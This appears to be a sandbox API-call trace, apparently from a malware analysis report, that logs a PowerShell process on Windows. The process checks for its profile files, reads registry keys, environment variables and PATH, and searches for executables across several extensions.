	[0356.916] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cdca0 | out: lpFileInformation=0x1cdca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0356.916] SetErrorMode (uMode=0x1) returned 0x1
	[0356.917] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x1cda90, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0356.917] SetErrorMode (uMode=0x1) returned 0x1
	[0356.917] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x1cdca0 | out: lpFileInformation=0x1cdca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0356.917] SetErrorMode (uMode=0x1) returned 0x1
	[0356.917] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0356.917] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0356.917] CoTaskMemFree (pv=0x437060) 
	[0356.918] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0356.918] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0356.918] CoTaskMemFree (pv=0x437060) 
	[0356.918] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0356.918] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0356.918] CoTaskMemFree (pv=0x437060) 
	[0356.919] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0356.919] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0356.919] CoTaskMemFree (pv=0x437060) 
	[0356.919] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0356.919] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0356.919] CoTaskMemFree (pv=0x437060) 
	[0356.920] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x328
	[0356.920] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x32c
	[0356.920] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x330
	[0356.920] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x320
	[0356.920] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1b8
	[0356.920] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x2f4
	[0356.920] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x2f8
	[0356.921] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x36c
	[0356.921] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x370
	[0356.921] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x31c
	[0356.921] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x33c
	[0356.921] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x340
	[0356.922] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0356.922] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0356.922] CoTaskMemFree (pv=0x437060) 
	[0356.923] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0356.923] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x1cde80 | out: lpMode=0x1cde80) returned 1
	[0356.923] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0356.924] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0356.924] CoTaskMemFree (pv=0x437060) 
	[0356.925] SetEvent (hEvent=0x320) returned 1
	[0356.926] SetEvent (hEvent=0x328) returned 1
	[0356.926] SetEvent (hEvent=0x32c) returned 1
	[0356.926] SetEvent (hEvent=0x330) returned 1
	[0356.926] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x344
	[0356.927] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0356.927] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0356.927] CoTaskMemFree (pv=0x437060) 
	[0356.928] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cdbd8 | out: phkResult=0x1cdbd8*=0x348) returned 0x0
	[0356.928] RegQueryValueExW (in: hKey=0x348, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x1cdb5c, lpData=0x0, lpcbData=0x1cdb58*=0x0 | out: lpType=0x1cdb5c*=0x0, lpData=0x0, lpcbData=0x1cdb58*=0x0) returned 0x2

Thread:
	id = 155
	os_tid = 0x824


Thread:
	id = 164
	os_tid = 0x6bc


Thread:
	id = 191
	os_tid = 0x884


Thread:
	id = 250
	os_tid = 0xd3c


Thread:
	id = 259
	os_tid = 0xd60

	[0308.246] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0348.165] LocalFree (hMem=0x3b71b0) returned 0x0
	[0348.165] RegCloseKey (hKey=0x31c) returned 0x0
	[0348.165] LocalFree (hMem=0x3b7290) returned 0x0
	[0348.165] CloseHandle (hObject=0x30c) returned 1
	[0348.166] CloseHandle (hObject=0x13) returned 1
	[0348.168] CloseHandle (hObject=0xf) returned 1
	[0348.169] RegCloseKey (hKey=0x2f8) returned 0x0
	[0348.169] RegCloseKey (hKey=0x2f4) returned 0x0
	[0348.169] RegCloseKey (hKey=0x2f0) returned 0x0
	[0350.565] RegCloseKey (hKey=0x320) returned 0x0
	[0354.036] RegCloseKey (hKey=0x30c) returned 0x0
	[0354.036] RegCloseKey (hKey=0x2f8) returned 0x0
	[0354.036] RegCloseKey (hKey=0x2f4) returned 0x0
	[0354.036] RegCloseKey (hKey=0x1b8) returned 0x0
	[0354.037] RegCloseKey (hKey=0x320) returned 0x0
	[0354.037] RegCloseKey (hKey=0x330) returned 0x0
	[0354.037] RegCloseKey (hKey=0x32c) returned 0x0
	[0354.037] RegCloseKey (hKey=0x328) returned 0x0
	[0354.038] RegCloseKey (hKey=0x324) returned 0x0
	[0354.038] RegCloseKey (hKey=0x31c) returned 0x0
	[0355.899] RegCloseKey (hKey=0x368) returned 0x0
	[0355.899] RegCloseKey (hKey=0x364) returned 0x0
	[0355.899] RegCloseKey (hKey=0x360) returned 0x0
	[0355.899] RegCloseKey (hKey=0x35c) returned 0x0
	[0355.900] RegCloseKey (hKey=0x30c) returned 0x0
	[0355.900] RegCloseKey (hKey=0x374) returned 0x0
	[0355.900] RegCloseKey (hKey=0x354) returned 0x0
	[0355.900] RegCloseKey (hKey=0x350) returned 0x0
	[0355.901] RegCloseKey (hKey=0x34c) returned 0x0
	[0355.901] RegCloseKey (hKey=0x348) returned 0x0
	[0355.901] RegCloseKey (hKey=0x344) returned 0x0
	[0355.902] RegCloseKey (hKey=0x340) returned 0x0
	[0355.902] RegCloseKey (hKey=0x33c) returned 0x0
	[0355.902] RegCloseKey (hKey=0x31c) returned 0x0
	[0355.902] RegCloseKey (hKey=0x370) returned 0x0
	[0355.902] RegCloseKey (hKey=0x36c) returned 0x0
	[0355.903] RegCloseKey (hKey=0x2f8) returned 0x0
	[0355.903] RegCloseKey (hKey=0x2f4) returned 0x0
	[0355.903] RegCloseKey (hKey=0x1b8) returned 0x0
	[0355.903] RegCloseKey (hKey=0x320) returned 0x0
	[0355.904] RegCloseKey (hKey=0x330) returned 0x0
	[0355.904] RegCloseKey (hKey=0x32c) returned 0x0
	[0355.904] RegCloseKey (hKey=0x328) returned 0x0
	[0355.904] RegCloseKey (hKey=0x324) returned 0x0
	[0641.501] RegCloseKey (hKey=0x348) returned 0x0

Thread:
	id = 278
	os_tid = 0xdf4


Thread:
	id = 374
	os_tid = 0x3f4

	[0357.171] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0357.175] SetThreadUILanguage (LangId=0x0) returned 0x7fffffa0409
	[0357.180] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0357.180] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0357.180] CoTaskMemFree (pv=0x437060) 
	[0357.181] VirtualQuery (in: lpAddress=0x1c7ad700, lpBuffer=0x1c7ae5c0, dwLength=0x30 | out: lpBuffer=0x1c7ae5c0*(BaseAddress=0x1c7ad000, AllocationBase=0x1be20000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0357.184] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0357.184] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0357.184] CoTaskMemFree (pv=0x437060) 
	[0357.187] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0357.187] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0357.187] CoTaskMemFree (pv=0x437060) 
	[0357.195] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0357.195] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0357.195] CoTaskMemFree (pv=0x437060) 
	[0357.205] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0357.205] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0357.205] CoTaskMemFree (pv=0x437060) 
	[0357.207] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0357.207] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0357.207] CoTaskMemFree (pv=0x437060) 
	[0357.209] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0357.209] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0357.209] CoTaskMemFree (pv=0x437060) 
	[0357.354] VirtualQuery (in: lpAddress=0x1c7ad9b0, lpBuffer=0x1c7ae870, dwLength=0x30 | out: lpBuffer=0x1c7ae870*(BaseAddress=0x1c7ad000, AllocationBase=0x1be20000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0357.355] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0357.355] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0357.355] CoTaskMemFree (pv=0x437060) 
	[0357.357] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0357.357] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0357.358] CoTaskMemFree (pv=0x437060) 
	[0357.358] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0357.358] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0357.358] CoTaskMemFree (pv=0x437060) 
	[0357.359] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0357.359] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0357.359] CoTaskMemFree (pv=0x437060) 
	[0357.363] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0357.363] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0357.363] CoTaskMemFree (pv=0x437060) 
	[0357.529] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0357.529] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0357.529] CoTaskMemFree (pv=0x437060) 
	[0357.531] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0357.531] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0357.531] CoTaskMemFree (pv=0x437060) 
	[0357.533] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0357.533] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0357.533] CoTaskMemFree (pv=0x437060) 
	[0357.535] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0357.535] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0357.535] CoTaskMemFree (pv=0x437060) 
	[0357.537] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0357.537] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0357.537] CoTaskMemFree (pv=0x437060) 
	[0357.538] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0357.538] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0357.538] CoTaskMemFree (pv=0x437060) 
	[0357.540] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0357.540] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0357.540] CoTaskMemFree (pv=0x437060) 
	[0357.638] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0357.638] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0357.638] CoTaskMemFree (pv=0x437060) 
	[0357.851] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0357.851] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0357.851] CoTaskMemFree (pv=0x437060) 
	[0357.854] CoTaskMemAlloc (cb=0x104) returned 0x437060
	[0357.854] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x437060, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0357.854] CoTaskMemFree (pv=0x437060) 
	[0357.854] CoTaskMemAlloc (cb=0x128) returned 0x3f3e50
	[0357.854] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3f3e50, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0357.854] CoTaskMemFree (pv=0x3f3e50) 
	[0357.858] CoTaskMemAlloc (cb=0x20e) returned 0x1b7225e0
	[0357.858] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b7225e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0357.858] CoTaskMemFree (pv=0x1b7225e0) 
	[0357.862] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0357.863] SetErrorMode (uMode=0x1) returned 0x1
	[0357.866] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0357.977] SetErrorMode (uMode=0x1) returned 0x1
	[0357.979] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0357.979] SetErrorMode (uMode=0x1) returned 0x1
	[0357.979] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0357.987] SetErrorMode (uMode=0x1) returned 0x1
	[0357.988] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0357.988] SetErrorMode (uMode=0x1) returned 0x1
	[0357.988] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0357.996] SetErrorMode (uMode=0x1) returned 0x1
	[0357.998] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0357.998] SetErrorMode (uMode=0x1) returned 0x1
	[0357.998] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.005] SetErrorMode (uMode=0x1) returned 0x1
	[0358.007] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0358.007] SetErrorMode (uMode=0x1) returned 0x1
	[0358.007] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.075] SetErrorMode (uMode=0x1) returned 0x1
	[0358.076] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0358.076] SetErrorMode (uMode=0x1) returned 0x1
	[0358.076] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.084] SetErrorMode (uMode=0x1) returned 0x1
	[0358.085] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0358.085] SetErrorMode (uMode=0x1) returned 0x1
	[0358.086] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.093] SetErrorMode (uMode=0x1) returned 0x1
	[0358.095] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0358.095] SetErrorMode (uMode=0x1) returned 0x1
	[0358.095] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.155] SetErrorMode (uMode=0x1) returned 0x1
	[0358.156] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0358.156] SetErrorMode (uMode=0x1) returned 0x1
	[0358.156] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBE", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.164] SetErrorMode (uMode=0x1) returned 0x1
	[0358.165] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0358.165] SetErrorMode (uMode=0x1) returned 0x1
	[0358.166] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.JS", lpFindFileData=0x1c7ad8e0 | out: lpFindFileData=0x1c7ad8e0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0358.173] SetErrorMode (uMode=0x1) returned 0x1
	[0358.175] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c7ad740, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0358.175] SetErrorMode (uMode=0x1) returned 0x1
